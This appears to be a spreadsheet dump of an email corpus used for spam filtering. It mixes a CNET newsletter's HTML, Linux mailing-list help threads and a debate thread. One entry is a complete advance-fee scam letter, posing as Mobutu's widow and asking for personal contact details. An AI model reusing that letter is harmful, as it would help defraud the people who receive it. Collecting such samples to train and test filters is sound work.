 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 November-nervous lawmakers hogged the stage in a show of outrage and concern, while fact-finding barely made a cameo.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1QVDLkOckUMBXB6W5WWcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Can Bush walk his talk?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 He said much that was right in his Wall Street speech. But doubts swirl about his follow-through--and his own business dealings.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQJGP2PgqHSCN0U7nQUDRR"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href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqeTP7isAE64qDAwrPGFR"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href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDmG6iLMKE-nFr99H29R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWd3DTm_7zGZP85eXsJh-uR"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href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCeDGOf-0pvVdi5Z7edsR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFUlrtn8Gg3F-erCpGY99R"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href="http://clickthru.online.com/Click?q=1d-6KTjIGQF7vBorG2Rl28NRQSnqQuR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3YG9RDDFWVhZSgRXBsR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH1jjlT3oOiJGu_NEsnEPR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPblYC58a53xlZk0f-IonR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHlkzdzqwuBXvl3NU2rR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJonnAspRkSjaeTldfVpfRR"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src="http://news.cnet.com/i/ne/bb/2002/07/0710_e911.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo2p6Uz8s0dAVJ9PZAKTFR" &gt;Tech hurdles ahead for e911&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis looks at the technology hurdles facing wireless carriers in launching the second phase of the e911 initiative by October.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJr-Se-ffadxQMKtNX8PQ9R" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaF-nM3JQzSROUJEymxquR"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href="http://clickthru.online.com/Click?q=db-rmY9QJEK6mDms3AvpmtTwxp6DtFR" &gt;
 India's Infosys tops forecast but is wary&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4KiNZqZn2fqfAgMcXea9R" &gt;
 Liberty Alliance to unveil software spec&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRMaM-BsfnODtxI8fiiuR" &gt;
 FBI picks new CIO&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6wzvb-Hd5q0_HZB17WsR" &gt;
 Stocks slump on accounting jitters&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzAaB28WBP26D_8gaZjMZR" &gt;
 eBay glitch charges sellers double&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYMOxuv-EMLKlXBDgnVnR" &gt;
 Bush speech leaves Wall Street doubting&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthMcws3SlpW-B_KMqztrR" &gt;
 WorldCom scrutiny goes federal&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2bidebRQA5K-fxuEL5iR" &gt;
 Comcast shareholders bless AT&amp;T deal&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lFgRjgUtuoAABMMPZ9FR" &gt;
 U.S. Attorney investigates Qwest&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabmTn7scCW5CH7esbKR9R" &gt;
 Banks bail out Vivendi with loans&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB45sz-3ZQhaIHsSzky0uR" &gt;
 Bush security plan may get privacy nod&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-QCMEj6Z5znP-FdWuuFR" &gt;
 Gnutella pioneer Gene Kan dies&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWIvKVzg4mkSWreAgRDc9R" &gt;
 Verizon dials in for downtown details&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7YCsZ0lxv3orMjEsaQuR" &gt;
 Taiwan's Acer sees lax tech rebound&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-YjVlL1_XGuwrfzJ6nsR" &gt;
 Chipmaker packs Wi-Fi into handhelds&lt;/a&gt;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href="http://clickthru.online.com/Click?q=17-agitI5Xrfbnz4KFIz4s1RhjGRsZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=2c-DahOzZ0WqUqt_bG-NlpIpzwPQcEhGRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImGD-L1WU5CfCkxHB0FrR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9YCaBForctPQDwwaMCiR"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href="http://clickthru.online.com/Click?q=6c-SUL3IuPjjWm38CNKQCL5-NPyEdnR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KBrR-auEYpqfRO9R6BpKcR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduMdOnkLijZWSoS2P4JmRR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdY4fIeCrXydit0M-0OvFR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2zC9rXJC41H99K8FZuS9R" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1adE6bjbHCu4jNix1DPuR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e433&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=eb-HlLo-YD1MUIf_rRUm0wMYZqBt9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] spamassassin+razor2
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0018_01C254F9.146CF4F0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Hi all,
 I am wondering if anybody has successfully install a site-wide =
 spamassassin+razor2 installation. I am having so much trouble and the =
 following is the extract of my procmail.log.
 razor2 check skipped: Bad file descriptor Insecure dependency in open =
 while runn
 ing setuid at =
 /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm line
 410, &lt;GEN23&gt; line 1.
 &gt;&gt;From info@znion.com  Thu Sep  5 11:55:15 2002
  Subject: *****SPAM***** Computer Maintenance
   Folder: /home/eugene/caughtspam                                        =
   8343
 In razor-agent.log, I simply get the bootup message and that's it...
 Sep 05 11:55:15.668648 check[8478]: [ 1] [bootup] Logging initiated =
 LogDebugLeve
 l=3D14 to file:/var/log/razor-agent.log
 Please help. Thanks.
 Eugene
 ------=_NextPart_000_0018_01C254F9.146CF4F0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 5.50.4807.2300" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Hi all,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;I am wondering if anybody has =
 successfully install=20
 a site-wide spamassassin+razor2 installation. I am having so much =
 trouble and=20
 the following is the extract of my procmail.log.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;razor2 check skipped: Bad file =
 descriptor Insecure=20
 dependency in open while runn&lt;BR&gt;ing setuid at=20
 /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm =
 line&lt;BR&gt;410,=20
 &amp;lt;GEN23&amp;gt; line 1.&lt;BR&gt;From &lt;A=20
 href=3D"mailto:info@znion.com"&gt;info@znion.com&lt;/A&gt;&amp;nbsp; Thu Sep&amp;nbsp; 5 =
 11:55:15=20
 2002&lt;BR&gt;&amp;nbsp;Subject: *****SPAM***** Computer Maintenance&lt;BR&gt;&amp;nbsp; =
 Folder:=20
 /home/eugene/caughtspam&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;n=
 bsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nb=
 sp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=20
 8343&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;In razor-agent.log, I simply get the =
 bootup message=20
 and that's it...&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Sep 05 11:55:15.668648 check[8478]: [ =
 1] [bootup]=20
 Logging initiated LogDebugLeve&lt;BR&gt;l=3D14 to=20
 file:/var/log/razor-agent.log&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Please help. Thanks.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Eugene&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0018_01C254F9.146CF4F0--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</si>
  <si>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[ILUG] redhat kickstart
</t>
  </si>
  <si>
    <t xml:space="preserve">Check out this. Its for compaq kit, but a pc's a pc ;--)
 http://www.geocities.com/rlcomp_1999/procedures/kickstart-rh70.html
 There are other articles too.
 Hope that helps,
 CW
 ----------------
 How many Redhat admins out there use the redhat kickstart?
 If you don't use it, how do you install redhat on all your 
 workstations, do you do it by hand, with the cds?
 As we are looking at using Linux at work, I'm looking
 into setting up the kickstart. There doesn't seem to
 be a lot of documentation around about it.
 Does anybody know if it would be possible to do the following:
 Get the machine to boot using DHCP and read it's kickstart
 config file from teh DHCP server and in this config file
 have the machine configured to use a static IP, so that when
 the machine is rebooted it will come up with it's new IP.
 Also, There was no driver on the redhat network install flopopy
 for the network card in the machine I'm installing. This required
 me to uncompress the floppy image, loop mount it, add in the module
 for the network card and compress it all up again. I'm not going
 to be able to do this every time we get a new machine, I was
 wondering if instead of having a boot floppy, you could use a boot
 cdrom, but just for the purpose of having all the network card
 modules on the cdrom. I'd still want it to get the packages from
 an NFS server on the network.
 Any help with this would be greatly appreciated,
 cheers,
 deccy.
 -- 
 ---------------------------------------
 Declan Houlihan
 deccy@csn.ul.ie
 http://deccy.csn.ul.ie/
 ---------------------------------------
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: xine problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Nick wrote :
 &gt; 	I'm no longer able to play encrypted dvd's using the xine rpm from
 &gt; 	freshrpms. 
 &gt; I think it was about a week ago when I last rented some dvd's, worked
 &gt; just fine, but apparently since the latest xine update on freshrpms, it
 &gt; won't anymore. 
 &gt; The output is :
 &gt; 
 &gt; input_dvd: Sorry, this plugin doesn't play encrypted DVDs. The legal
 &gt; status
 &gt;            of CSS decryption is unclear and we can't provide such code.
 &gt;            Please check http://dvd.sf.net for more information.
 &gt; 
 &gt; I'm pretty sure it worked with the previous freshrpms release... Any way
 &gt; of rolling back updates ?
 If you get this message, it means that you're using the "DVD" button, which
 is the default DVD plugin and doesn't support decryption. You should either
 use the "d4d" one (no menus) or "d5d" (with menus).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</si>
  <si>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A CRY FOR HELP
</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR FRIEND,I AM MRS.  SESE-SEKO WIDOW OF LATE PRESIDENT MOBUTU
 SESE-SEKO OF ZAIRE? NOW KNOWN AS DEMOCRATIC REPUBLIC
 OF CONGO (DRC).  I AM MOVED TO WRITE YOU THIS LETTER,
 THIS WAS IN CONFIDENCE  CONSIDERING MY PRESENTCIRCUMSTANCE AND SITUATION.
 I ESCAPED ALONG WITH MY HUSBAND AND TWO OF OUR SONS
 GEORGE  KONGOLO  AND BASHER  OUT OF DEMOCRATIC REPUBLIC OF
 CONGO (DRC) TO ABIDJAN, COTE D'IVOIRE WHERE MY FAMILY
 AND I SETTLED, WHILE WE LATER MOVED  TO SETTLED IN
 MORROCO WHERE MY HUSBAND LATER DIED OF CANCER
 DISEASE. HOWEVER DUE TO THIS SITUATION WE DECIDED TO
 CHANGED  MOST OF MY HUSBAND'S BILLIONS OF DOLLARS
 DEPOSITED IN SWISS BANK AND OTHER COUNTRIES INTO OTHER
 FORMS OF MONEY CODED FOR  SAFE PURPOSE BECAUSE THE NEW
 HEAD OF STATE OF (DR) MR LAURENT  KABILA HAS MADE
 ARRANGEMENT WITH THE SWISS GOVERNMENT AND OTHER
 EUROPEAN COUNTRIES TO FREEZE ALL MY LATE HUSBAND'S
 TREASURES  DEPOSITED IN SOME EUROPEAN COUNTRIES. HENCE
 MY CHILDREN AND I DECIDED LAYING LOW IN AFRICA TO
 STUDY THE SITUATION TILL  WHEN THINGS GETS BETTER,
 LIKE NOW THAT PRESIDENT KABILA IS DEAD AND THE SON
 TAKING OVER (JOSEPH KABILA). ONE OF MY LATE HUSBAND'S
 CHATEAUX IN SOUTHERN FRANCE WAS CONFISCATED  BY THE
 FRENCH GOVERNMENT, AND AS SUCH I HAD TO CHANGE MY
 IDENTITY  SO THAT MY INVESTMENT WILL NOT BE TRACED AND
 CONFISCATED. I HAVE DEPOSITED THE SUM EIGHTEEN MILLION
 UNITED STATE DOLLARS(US$18,000,000,00.)  WITH A
 SECURITY COMPANY , FOR SAFEKEEPING. THE  FUNDS ARE
 SECURITY CODED TO PREVENT THEM FROM
 KNOWING THE CONTENT. WHAT I WANT YOU TO DO IS TO
 INDICATE YOUR INTEREST THAT YOU WILL ASSIST US BY RECEIVING THE MONEY ON OUR
 BEHALF.ACKNOWLEDGE THIS MESSAGE, SO THAT I CAN INTRODUCE YOU TO MY SON
 (KONGOLO) WHO HAS THE OUT MODALITIES FOR THE CLAIM OF THE SAID FUNDS. I
 WANT YOU TO ASSIST IN INVESTING THIS MONEY, BUT I WILL NOT WANT MY IDENTITY
 REVEALED. I WILL ALSO WANT TO BUY PROPERTIES AND STOCK IN MULTI-NATIONAL
 COMPANIES AND TO ENGAGE IN OTHER SAFE AND
 NON-SPECULATIVE INVESTMENTS. MAY I AT THIS POINT
 EMPHASISE THE HIGH LEVEL OF CONFIDENTIALITY,  WHICH
 THIS BUSINESS DEMANDS, AND HOPE YOU WILL NOT BETRAY
 THE TRUST AND CONFIDENCE, WHICH I REPOSE IN YOU. IN
 CONCLUSION,  IF YOU WANT TO ASSIST US , MY SON SHALL
 PUT YOU IN THE PICTURE  OF THE BUSINESS, TELL YOU
 WHERE THE FUNDS ARE CURRENTLY BEING  MAINTAINED AND
 ALSO DISCUSS OTHER MODALITIES INCLUDING REMUNERATIONFOR YOUR SERVICES.
 FOR THIS REASON KINDLY FURNISH US YOUR CONTACT
 INFORMATION, THAT IS YOUR PERSONAL TELEPHONE AND FAX
 NUMBER FOR CONFIDENTIAL PURPOSE.BEST REGARDS,MRS M. SESE SEKO
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: RH 8 no DMA for DVD drive
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Jesse wrote :
 &gt; When I worked as a PC repair tech for a Computer store chain, I did
 &gt; run across quite a few DVD drives that would lock up if DMA was
 &gt; enabled.  It's more of a chipset/drive problem than a Drive by itself.
 Chipset? Let me guess : VIA or SiS? :-))))
 OK, so I'll follow Red Hat's choice of leaving the DMA setting alone and
 orienting the users to some page explaining how to enable it "at your own
 risk" ;-)
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.03 0.09 0.10
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Critical US satellites could be hacked
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8708820,1440/
 Date: Not supplied
 Military communications could be jammed or intercepted and satellites thrown 
 off course or destroyed, a new US study warns
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Our friends the Palestinians, Our servants in government.
</t>
  </si>
  <si>
    <t xml:space="preserve">when brickbats or fox exposes the folly of government they do so to
 accomplish a specific end; dumping truckload after truckload of bad acts
 proves their point: stupidity and greed typify government, therefore any
 government is too much government.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
 Hall
 Sent: Sunday, October 06, 2002 5:03 PM
 Cc: 'FoRK'
 Subject: RE: Our friends the Palestinians, Our servants in government.
 Yes, you read the links.
 Sorry, but exposing folly is not only humorous but also instructive.  It
 is only by exposing folly to ridicule that you stop it in the first
 place.
 'Brickbats' leans heavily on both, though the item I highlighted was a
 'horror' item not a 'gee that is stupid' item.  For an example of the
 latter, see the city that wanted a woman to pay a ticket for parking in
 an UNmarked no-parking space.
 &gt; From: Geege Schuman [mailto:geege@barrera.org]
 &gt;
 &gt; see my first line: I READ THE LINKS.  brickbats.  idiot.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "Gary Lawrence Murphy" &lt;garym@canada.com&gt;
 &gt; ... and the one thing I think we've learned in all that time is that,
 &gt; as a help-desk, it doesn't work.
 I'm not sure they are doing strictly help-desk stuff.
 But the whole 'who in their right mind would use that? it doesn't have all
 these cool features!' isn't always a guarantee of failure - maybe there is a
 strength in this approach (agents and/or IM as ui) than can find a nich
 application space.
 &gt;
 &gt; In all the prolog-based NL database query systems of the 1980's and
 &gt; other later chatterbot helpdesk projects like Shallow Red, even
 &gt; simpler tries like Ask Jeeves, people very quickly know they're
 &gt; talking to a robot, and the queries anneal to short, truncated and
 &gt; terse database-like verb-noun or just noun-keyword requests.
 Kind of like a web query - and with google, someone else can turn them into
 a link so you don't even have to type anything.
 &gt;
 &gt; People are just too quick to adapt, and too impatient to forgive a
 &gt; clunky interface, and for now, especially when the /average/ computer
 &gt; user still can't type more than maybe 5-10wpm, NL is a painfully slow
 &gt; clunky interface.
 Yes - true true.
 &gt;
 &gt; Put it this way: Would you login, wake the bot and ask for the Seattle
 &gt; weather, or would you do as we /all/ do and just click the weather
 &gt; icon sitting there on your desktop?
 What about a situation where you don't directly ask/talk to the bot, but
 they listen in and advise/correct/interject/etc?
 example: two people discussing trips, etc. may trigger a weather bot to
 mention what the forecast says - without directly being asked.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] cdrecord + 2.4.19 = hard-lock
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,
 I have been using 2.4.19 since a couple of days on a Mandrake 8.2 with
 standard RPMs for cdrecord and it didn't give any hard locks on it at
 all, i've already burnt a couple of CDs.
 Steph
 On Sat, 2002-08-10 at 01:58, Michael Conry wrote:
 &gt; Hi all,
 &gt; I've run into a fairly intractable (for me) problem, and was wondering
 &gt; if anybody could give me pointers on how to deal with it.
 &gt; 
 &gt; I am running Debian Woody on a Pentium III IDE based system.
 &gt; I have a Ricoh 7083a ide cd rewriter, which I use using cdrecord and the
 &gt; scsi over ide kernel modules.  I was running kernel 2.4.18 until
 &gt; probably last weekend when I noticed 2.4.19 was out.  Downloaded patch
 &gt; and installed new kernel with no real problems.  This morning I went to
 &gt; burn a CDROM, and the system locked hard.  Rebooting into 2.4.18 allowed
 &gt; cdburning to work fine.
 &gt; 
 &gt; This problem is very reproducible (on my system at least).
 &gt; the cdrecord command I was using was
 &gt;     cdrecord -v speed=4 blank=fast dev=0,1,0 -data bak.iso
 &gt; The blanking appears to go ok, but when it tries to write data, it just
 &gt; locks up the entire system (can't ping it from outside even).  AFAICS,
 &gt; the system just stops.  Hard reset is only way back in, and when it does
 &gt; reboot, I cannot see anything useful in any logfiles (/var/log/messages
 &gt; /var/log/kern.log /var/log/syslog, at any rate).
 &gt; cdrecord -scanbus works fine and reports the two pseudo-scsi devices (my
 &gt; cdr drive and my cdrw).
 &gt; The same lock occurs even if there is no blanking.
 &gt; 
 &gt; I tried upgrading to 2.4.20-pre1-ac1 (on assumption that if there was a
 &gt; kernel issue it might have been fixed in these patches), but it gives
 &gt; the same error.  I also downloaded and compiled the source for
 &gt; cdrecord 1.1.10, and installed it instead of the debian package (i was
 &gt; wondering if maybe there was some compile option the packager had used
 &gt; which maybe would cause the problem), and still the problem persisted.
 &gt; 
 &gt; Anyway, I'm completely stumped.  Google searching has not done me much
 &gt; good, and I'm a little bit lost.  What I'd like to know is
 &gt; a)  How to fix the problem ;-)
 &gt; b)  Is this likely to be an application or kernel problem?  The severity
 &gt;     of the crash would make me suspect it is a kernel problem, but I'm
 &gt;     not very knowledgeable on these things.
 &gt; c)  Should I post a description of this to the kernel mailing list? If
 &gt;     this is an appropriate course of action, are there any tips (beyond
 &gt;     the guidelines on kernel.org)?
 &gt; 
 &gt; Like I said, I'm lost on this one, so any info is very gratefully
 &gt; received.
 &gt; mick
 &gt; -- 
 &gt; Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
 &gt; Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt; List maintainer: listmaster@linux.ie
